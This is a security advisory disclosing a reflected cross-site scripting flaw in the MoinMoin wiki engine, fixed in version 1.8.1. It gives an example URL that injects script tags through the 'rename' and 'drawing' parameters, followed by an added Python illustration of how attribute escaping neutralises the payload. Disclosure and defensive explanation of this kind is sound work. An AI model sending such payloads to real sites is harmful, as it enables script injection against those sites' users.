MoinMoin Wiki Engine XSS Vulnerability

From: swhite@securestate.com
To: bugtraq@securityfocus.com
Cc:
Subject: MoinMoin Wiki Engine XSS Vulnerability
Date:


MoinMoin Wiki Engine Cross-Site Scripting

Discovered by: SecureState R&D Team (sasquatch)

Website: www.securestate.com

Discovered: 01-08-09

Vendor Notified: 01-08-09

Vendor Fix Issued: 01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)

Vendor Fix: Upgrade to version 1.8.1

Public Posting: 01-19-09

Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>
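The example URL puts a `">` sequence in front of each script tag, which is the shape of a value breaking out of a quoted HTML attribute. The following is an added illustration, not MoinMoin's code and not part of the original advisory: it assumes the `rename` and `drawing` values are reflected into a quoted attribute (the `<input>` template is hypothetical) and shows how an HTML parser sees the output with and without attribute escaping.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The example URL from the advisory, unchanged (alert() markers only).
ADVISORY_URL = (
    "http://moinmo.in/moinmoin/WikiSandBox?rename=\"><script>alert('rename xss')"
    "</script>&action=AttachFile&drawing=\"><script>alert('drawing xss')</script>"
)

def query_params(url):
    """Return the first decoded value of each query parameter."""
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}

def render_unescaped(name, value):
    # Hypothetical template: the request value is pasted into a quoted attribute.
    return '<input type="hidden" name="%s" value="%s">' % (name, value)

def render_escaped(name, value):
    # html.escape(quote=True) encodes & < > " ' so the value stays inside the attribute.
    return '<input type="hidden" name="%s" value="%s">' % (
        name, html.escape(value, quote=True))

class TagCollector(HTMLParser):
    """Records the start tags an HTML parser sees and the input's value."""
    def __init__(self):
        super().__init__()
        self.tags, self.value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")

def parse(fragment):
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags, collector.value

if __name__ == "__main__":
    params = query_params(ADVISORY_URL)
    for name in ("rename", "drawing"):
        print(name, "unescaped:", parse(render_unescaped(name, params[name]))[0])
        print(name, "escaped:  ", parse(render_escaped(name, params[name]))[0])
```

With escaping, the parser sees a single `input` element whose value round-trips to the original string; without it, a `script` element appears in the page.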




